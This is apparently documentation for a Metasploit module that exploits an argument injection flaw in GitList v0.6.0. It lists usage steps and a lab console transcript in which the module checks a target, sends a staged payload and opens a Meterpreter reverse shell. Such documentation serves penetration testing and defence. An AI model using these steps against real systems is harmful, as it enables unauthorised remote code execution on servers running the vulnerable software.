## Description

  This module exploits an argument injection vulnerability in GitList v0.6.0

## Vulnerable Application

  GitList v0.6.0

## Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: `use [exploit/multi/http/gitlist_arg_injection]`
  4. Do: `set RHOSTS [IP]`
  5. Do: `run`
  6. You should get a session.

## Scenarios

### Tested on Ubuntu 18.04 x64

  ```
  msf5 > use exploit/multi/http/gitlist_arg_injection
  msf5 exploit(multi/http/gitlist_arg_injection) > set rhosts 192.168.37.141
  rhosts => 192.168.37.141
  msf5 exploit(multi/http/gitlist_arg_injection) > check
  [+] 192.168.37.141:80 The target is vulnerable.
  msf5 exploit(multi/http/gitlist_arg_injection) > run

  [*] Started reverse TCP handler on 192.168.37.1:4444
  [*] Sending stage (37775 bytes) to 192.168.37.141
  [*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.141:35804) at 2018-07-05 14:22:39 -0500

  meterpreter > sysinfo
  Computer    : ubuntu
  OS          : Linux ubuntu 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64
  Meterpreter : php/linux
  meterpreter >

  ```
